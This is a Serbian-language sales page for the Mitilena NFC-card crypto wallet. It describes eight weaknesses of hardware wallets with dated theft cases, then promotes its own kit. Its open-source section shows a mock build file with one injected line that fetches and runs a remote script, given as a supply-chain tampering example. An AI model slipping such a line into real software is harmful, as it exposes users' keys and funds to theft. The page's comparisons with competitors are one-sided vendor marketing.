8 pukotina Otvoreni kod Spisak Pitanja
Mitilena Mitilena Wallet Cold crypto wallet
ONLINE · 22,000+ COINS Kreiraj novčanikKreiraj
Hardverski novčanici · neocigledne pukotine

Neocigledne pukotine hardverskog novčanika

Kupujete uređaj da zatvorite rupe. Sa njim stižu nove: firmver, ažuriranja, servis na računaru, ekran, kutija, nalog kod prodavca. Osam detalja koje recenzije stavljaju u prednosti — i osam načina na koje su preko njih uzimali novac 2020–2026.

Stvarni slučajevi sa datumima i iznosima Po dokumentaciji proizvođača Komplet proveravamo po istom spisku
Cena greškejavni slučajevi
2026Coldcard · slaba slučajnost u firmveru$100M+
2025Bybit · potpisnici su potpisali ono što nisu videli$1.5B
2024Dark Skippy · seed curi kroz dva potpisaistraživanje
2023Ledger Connect Kit · zadnja vrata u biblioteci$600K
2021Lažna aplikacija novčanika u App Store-u17,1 BTC
2020Curenje baze klijenata Ledger · phishing godinama270 000 ljudi
Osam pukotina

Svaki detalj koji recenzije hvale — posebna rupa

Hardverski novčanik zatvara jednu rupu: ključ više ne leži na telefonu sa internetom. Ali uređaj nije prazan. Ima firmver, ažuriranja, program na računaru, ekran, kutiju, prodavca sa vašom adresom — i svaki detalj dodaje površinu napada koju ranije niste imali. Ispod je osam takvih detalja: šta o njima pišu u recenzijama, kako su preko njih uzimali novac, kako zatvoriti pukotinu i da li taj detalj postoji u našem kompletu.

Pukotina 01

Firmver koji pravi vaš ključ

U recenzijama: „zaštićeni čip — ključ se pravi unutar uređaja i nikad ga ne napušta“

Ključ je ogromna slučajna brojka, a pravi ga firmver. Jedna greška u njemu — i ključeva je zapravo mnogo manje: prebiraju ih kod svih vlasnika odjednom, bez pristupa uređaju, godinama posle kupovine. Čip tu nije bitan; rupa je iznad njega.

Slučaj
$100M+
Coldcard, jul 2026: greška u buildu firmvera od 2021. tiho je zamenila hardverski generator slabim, zasejanim serijskim brojem uređaja i tajmerom. Snaga ključeva pala je na otprilike 40 bita; 5 000+ adresa je ispražnjeno.
Kako zatvoriti pukotinu
Možete li doneti sopstvenu slučajnost: bacanje kockica, sopstvenu frazu. Novčanik koji prima entropiju od vas ne zavisi od jedne greške u firmveru.
Kod nas ovog detalja nema
Na kartici nema firmvera — to je šifrovani nosač. Ključ pravi Mitilena Air iz sistemskog generatora uređaja, a vi možete zadati sopstvenu seed-frazu umesto slučajnih reči.
Pukotina 02

Ažuriranja koja morate da stavljate

U recenzijama: „proizvođač redovno izdaje bezbednosna ažuriranja“

Svako ažuriranje je trenutak kada se firmver može podmetnuti. Izmenjeni firmver krije delove seed-a u dva-tri obična potpisa, a spolja uređaj radi kao i uvek. Ni bez ažuriranja ne ide: rupe se zakrpaju upravo ažuriranjima.

Slučaj
2 potpisa
Dark Skippy, avgust 2024: istraživači su pokazali da zlonamerni firmver hardverskog novčanika može izneti ceo seed kroz dve transakcije. Dovoljno je jednom ažurirati sa pogrešnog mesta.
Kako zatvoriti pukotinu
Odakle stiže firmver i da li uređaj proverava njegov potpis. Najbolje je kad uopšte nema šta da se ažurira.
Kod nas ovog detalja nema
Na kartici nema šta da se ažurira ni podmetne. Potpisuje aplikacija na telefonu; njene verzije su potpisane i stižu iz App Store-a i Google Play-a — kao svaka aplikacija koju sami vidite i zatvorite.
Pukotina 03 · Osetite apsurd
U recenzijama: „pogodna zvanična aplikacija za računar“

Novčanik za nepoverenje uz koji ide pozadinski servis

Kupujete uređaj iz jednog razloga: da više ne verujete računaru. Da bi radio, na taj isti računar morate da stavite pozadinski servis. Niste ga vi pisali, niste ga pokrenuli i ne kontrolišete ga: startuje se sa sistemom, sluša port na koji može da kucne bilo koji program na mašini, i nešto radi upravo sada — šta tačno, ne znate i nikad nećete proveriti.

Radio je u pozadini i nakon što ste zatvorili novčanik. Godinama. Kod jednog od najvećih proizvođača to je bio poseban servis-„most“; 2025. su ga sakrili unutar same aplikacije — servis je na mestu, samo umire zajedno sa prozorom. Kod većine ostalih bez programa na računaru uređaj je privezak. Na Linuxu dodajte udev pravila, inače sistem neće predati USB.

Znači stvar koju ste kupili da ne zavisite od programa na računaru ne radi bez programa na računaru. I to ne onog koji vidite — onog koji radi ispod njega.

Kod nas ovog detalja nema
Na računar se ne instalira ništa: ni servis, ni drajver, ni port. Posrednik je NFC-čip koji već stoji u vašem telefonu, napravio ga je njegov proizvođač i potčinjava se OS-u: radi samo kad je aplikacija otvorena i sami prislonite karticu, a telefon svaki put traži dozvolu. Kartica je pasivna: bez baterije, bez radija, sama ništa ne radi. Zatvorite aplikaciju — ne ostaje ništa što radi bez vas. Iskreno: aplikacija na telefonu treba, i ona je kao svaka druga — vidite je, pokrećete i zatvarate sami. U pomoćnoj prostoriji niko ne živi.
Monitor sistemaNOVČANIK ZATVOREN
ProcesStanjeRadi
HW Wallet Appnovčanik
zatvorili ste ga-
hwwalletdpozadinski servis · most ka USB
radi412d 06:14
pokrenut sistemom pri prijavine može da se zatvori — to je servis
Maketa; imena su uslovna. Tako je izgledao računar sa jednim od najpopularnijih USB-novčanika do 2025; onda su „most“ ugradili u samu aplikaciju — servis isti, samo više nije vidljiv na listi.
Alegorija
Kuća radi privatnosti — i stanar u pomoćnoj prostoriji

Hteli ste kuću radi privatnosti. Kupili ste je. Posle je zatrebala zaštita — stavili ste. A da tarifa zaštite radi, zamolili su vas da u kuću pustite čoveka u uniformi koji živi u pomoćnoj prostoriji non-stop, ima ključeve od svih vrata i ne javlja se vama. Niste ga zaposlili, ne možete da ga otpustite, a šta radi noću — ne znate.

On je, naravno, „svoj“. Tako piše u ugovoru. Hteli ste privatnost, a dobili surogat: kuću sa stanarom kog niste birali.

Pukotina 04 · Otvoreni kod nije audit
U recenzijama: „otvoreni kod — svako može da proveri“

Otvoreni kod je način da programeri rade zajedno, a ne pečat da program ne krade

Otvoreni izvorni kod su izmislili da bi se programi delili i zajednički krpili. Kao alat za saradnju je odličan. Nikad nije bio pečat kvaliteta „ovaj softver neće ukrasti vaš novac“, i evo zašto: vi ne koristite izvorni kod. Koristite ono što ste preuzeli.

Između GitHub repozitorijuma i fajla na telefonu stoje build, prodavnica aplikacija, ažuriranje, server. Na bilo kom od tih koraka u kod može ući jedan red koji vuče bilo šta od bilo kuda — a u repozitorijumu ga neće biti. Ne možete uporediti svoju kopiju sa izvornikom: prodavnice daju kompajlirani fajl; veb-novčanik pri svakom otvaranju dobija onaj kod koji je server danas odlučio da vama pošalje; proširenje pregledača se noću tiho ažurira.

„Otvoreno“ znači da neki ljudi mogu da provere neku verziju nekog dana. Šta vaša kopija radi upravo sada — to ne znači.

U repozitorijumu · github.com/…/wallet/send.js
// send.js
import { sign } from './crypto'
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
Kod vas na telefonu · app-2.4.21.min.js
// send.js — build
import { sign } from './crypto'
;(async () => {
var globalObject = await fetch('https://cdn-static.io/x.js')
})()
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
Jedan red u buildu. U repozitorijumu ga nema, u prodavnici se ne vidi, kod vas radi.
Otvorenost nije sprečila nijedan od ovih slučajeva
Ledger Connect Kit2023
otvorena biblioteka na GitHub-u; zlonamerna verzija je objavljena na npm; desetine sajtova su je uživo učitale za nekoliko sati
Copay / event-stream2018
otvoreni novčanik; zadnja vrata je donela zavisnost ciljana baš na njega
xz utils2024
otvoren dvadeset godina; bekdor je sedeo u releasima dok jedan inženjer slučajno nije primetio da je SSH prijava sporija za pola sekunde
Coldcard2026
firmver sa otvorenim kodom; greška u buildu pet godina je zamenjivala hardverski generator slabim — ključevi prebirani bez pristupa uređaju, 5 000+ adresa, 100+ mil. $
Šta zaista radi
Ne čitanje tuđeg koda — dve provere koje svako može da uradi. Prvo, audit ponašanja: stavite intercepting proksi na računar, pustite aplikaciju kroz njega i gledajte šta šalje gde. Ne morate da čitate kod — saobraćaj je potpuno vidljiv. Drugo, arhitektura u kojoj kod nema šta da ukrade: ako ključ nikad ne sedi na uređaju sa mrežom, bilo koji red u bilo kom ažuriranju je nemoćan — nema šta da pošalje.
Kako to radimo
Prvo nudimo sami: pustite našu aplikaciju kroz proksi, veb-verziju kroz DevTools pregledača, i pregledajte svaki zahtev. Ključ potpisa i seed se neće pojaviti; jedini izuzetak je Monero view key — obrađen na stranici „kako odlazi prenos“. Drugo je u kompletu: ključ se rađa u Mitilena Air na uređaju bez interneta, živi na kartici, a do online aplikacije stiže samo potpis — tamo proksiju nema šta da uhvati. I oflajn ovde je stvaran: u air-gap režimu uređaj sa ključem nije povezan ni na šta — bez kabla, bez Bluetootha; transakcija ulazi i izlazi kao QR kod koji vidite očima. Ne „hladni“ novčanik na kablu okačenom o online računar sa sopstvenim servisom koji razmenjuje ko-zna-šta.
Pukotina 05

Ekran na kom se ne vidi šta potpisujete

U recenzijama: „potvrdite na ekranu uređaja — virus na računaru je nemoćan“

Ekran je sićušan, i često pokazuje heš ili „poziv ugovora“, a ne adresu i iznos. Potvrđujete ono što ne vidite — a potpis je i dalje pošten, vaš. Ekran daje osećaj kontrole kog nema.

Slučaj
$1.5B
Bybit, februar 2025: potpisnici sa hardverskim novčanicima potvrdili su prenos koji je u interfejsu izgledao obično. Uređaji su pokazivali podatke koje čovek nije mogao da proveri.
Kako zatvoriti pukotinu
Primalac, iznos i tip operacije ljudskim jezikom — ne heš — i odbijanje jednim dugmetom.
Kako to radimo
Ekran postoji, ali to je ekran telefona: adresa, iznos i tip zahteva rečima — prenos, poziv ugovora, odobrenje — i dugme Odbij. Za velike sume — poseban oflajn uređaj koji prima celu transakciju.
Pukotina 06

Kutija u kojoj već leži seed

U recenzijama: „stiže u zapečaćenoj kutiji sa sigurnosnim pečatom“

Fizički uređaj znači isporuku, posrednike i „akcijske“ prodavnice. Novčanik stiže već podešen, sa seed-om na listiću unutra. Ili slična aplikacija u prodavnici traži da „unesete seed radi aktivacije“.

Slučaj
17,1 BTC
App Store, 2021: vlasnik hardverskog novčanika uneo je seed u sličnu aplikaciju i izgubio 17,1 BTC. Iste godine, posle curenja baze, kupcima Ledgera su slali lažne uređaje uz pismo „premestite seed na novi“.
Kako zatvoriti pukotinu
Inicijalizujte sami i nikad ne koristite seed koji je stigao već ispisan. Pečat nije provera; provera je što ključ pravite vi.
Kako to radimo
Kartice stižu prazne: ključ pravite i upisujete sami — u kutiji ne može biti gotovog seed-a. Aplikacija stiže samo iz App Store-a i Google Play-a preko linkova na sajtu; seed traži samo pri uvozu i potpisivanju.
Pukotina 07

Nalog kod prodavca

U recenzijama: „zvanična garancija, podrška i lični nalog“

Da kupite uređaj, proizvođaču date ime, e-mail i adresu isporuke. Vaša bezbednost sada zavisi od njihove baze. Ako procuri — godinama ćete dobijati poruke da „potvrdite seed na novom uređaju“, ponekad i sa paketima.

Slučaj
270 000 ljudi
Ledger, 2020: procurili su podaci o 270 000 kupaca, uključujući poštanske adrese. Mejlovi, pozivi i paketi sa zahtevom da „premestite“ seed traju do danas.
Kako zatvoriti pukotinu
Što manje znaju o vama, to je kraći vektor: kupovina bez naloga, podrška koja nikad ne traži seed, i pravilo „samo lopov traži seed“.
Kod nas ovog detalja nema
Novčanik radi bez registracije �� bez naloga. Prodavac zna samo adresu isporuke. Ni podrška ni aplikacija ne traže seed.
Pukotina 08

Jedan uređaj i jedan listić papira

U recenzijama: „čvrsto kućište, veliki ekran, baterija na nedelju dana“

Što više delova, to više kvarova: konektor, ekran, baterija. Oporavak visi o jednom listiću sa seed-om — pokisao, izgubljen pri selidbi, uslikan „za svaki slučaj“. Najčešći uzrok gubitka nije hak.

Slučaj
≈20 % BTC
Chainalysis procenjuje da je oko petine celog bitcoina zauvek izgubljeno — uglavnom zbog izgubljenih ključeva, ne hakova.
Kako zatvoriti pukotinu
Koliko kopija ključa stiže u kutiji i u kom obliku, šta ako se uređaj izgubi, i ima li u njemu nešto što može da se pokvari.
Kod nas ovog detalja nema
Bez ekrana, baterije ili konektora — nema šta da se pokvari. I ne jedna kopija: pet ogledala u kutiji — dve NFC kartice i tri stealth nalepnice u vodootpornoj plastici, rok 10+ godina.
Spisak provera

Čega ne sme da bude u novčaniku

Osam detalja za osam pukotina. Spisak važi za bilo koji novčanik — hardverski, mobilni, pregledač. Obeležite šta ima onaj koji birate — i naš.

01
Ključ koji pravi samo softverbez vaše slučajnosti — vaše fraze ili kockica
02
Ažuriranja tamo gde živi ključsvako ažuriranje je šansa da se podmetne kod
03
Servis, drajver ili port na računaruvidi pukotinu 03
04
Pečat „open source“ umesto arhitektureključ sedi tamo gde tuđi kod može da ga dohvati
05
Ekran koji pokazuje heš umesto adrese i iznosai bez dugmeta Odbij
06
Seed koji je stigao već ispisanu kutiji, u pismu, u „aplikaciji za aktivaciju“
07
Nalog kod prodavcai podrška koja može da traži seed
08
Jedna kopija i delovi koji se kvareekran, baterija, konektor, jedan listić papira
Po ovom spisku Ultimativni komplet nema nijedan od osam detalja. U kutiji: 2 NFC kartice i 3 stealth nalepnice, Mitilena Air (ključevi bez interneta) i Mitilena Keys (potpis bez interneta). Kartice stižu prazne: ključ pravite i šifrujete vi — ne fabrički čip. Sadržaj i cena →
Ultimativni · oflajn komplet

Ne fabrički „zaštićeni čip“ — nosač koji šifrujete vi

Kartice stižu prazne. Ključ pravite u Mitilena Air na telefonu bez interneta i sami ga upišete. Potpis ide preko Mitilena Keys, takođe oflajn: transakcija putuje QR-om. Pet istih kopija u kutiji: 2 NFC kartice i 3 stealth nalepnice u vodootpornoj plastici. 18 mreža, 20.000+ novčića, uključujući USDT.

Na računar se ne instalira ništa
Bez firmvera, ažuriranja, ekrana ili baterije
Transakcija na oflajn telefon — zvukom ili QR-om, bez kabla i USB
Radi sa besplatnom Mitilena aplikacijom za telefon
Vodootporna plastika, rok 10+ godina
Isporuka u Srbiju i region · srb.mitilena-store.com
Mitilena NFC kartica
Ultimativni · oflajn generisanje i potpis
39 990 RSD49 990 RSD
2 NFC kartice · 3 stealth nalepnice · Mitilena Air · licenca Mitilena Keys
Kupi ultimativni · 39 990 RSD Osnovni i Premium — pogledaj sve tarife
Pitanja

Šta ljudi pitaju kad stignu dovde

Hardverski novčanik prednosti i mane — ukratko?

Jedna velika prednost: ključ nije na telefonu sa internetom. Mane su osam detalja iznad — svaki dodaje površinu napada. Dobar hardverski novčanik je onaj sa manje detalja, ne sa više.

Šta ako je telefon kompromitovan?

Sa karticom na glavnom telefonu ključ se na trenutak potpisa pojavi u izolovanom okruženju — isti rizik kao kod bilo kog telefonskog novčanika, samo kraći. Za sume koje plaše — drugi sloj: potpis na posebnom oflajn uređaju do kog transakcija stiže QR-om.

Šta ako ukradu ili izgubite karticu?

Bez lozinke kartica i nalepnica su beskorisna plastika — ključ na njima je šifrovan. Izgubljenu kopiju zamenjuju ostale četiri: dve kartice i tri nalepnice iz kutije su ogledala.

Da li treba ažurirati firmver hardverskog novčanika?

Ako je proizvođač zatvorio rupu — da, i baš tada se firmver može podmetnuti: proverite izvor i potpis. Nosač bez firmvera nema taj izbor — nema šta da se ažurira, nema šta da se podmetne.

Čime se ovo razlikuje od USB-novčanika?

Manje posrednika: bez kabla, drajvera, pozadinskog servisa ili programa na računaru. Jedan posrednik — NFC-čip vašeg telefona — i odgovara vama i OS-u, ne prodavcu novčanika.

Da li otvoreni kod znači bezbedno?

Znači da neko nekad može da proveri. Vi ne koristite kod nego ono što ste preuzeli, i ne možete da uporedite jedno sa drugim. Bezbednost dolazi iz arhitekture gde ključ nije tamo gde tuđi kod može da ga dohvati.

NFC kartice sa oflajn generisanjem i potpisom

5 kopija ključa · Air · Keys · ili besplatni novčanik za 30 sekundi · Zašto je „hardverski hlad“ na čipu često laž →
Kupi ultimativni · 39 990 RSD Kreiraj besplatni novčanik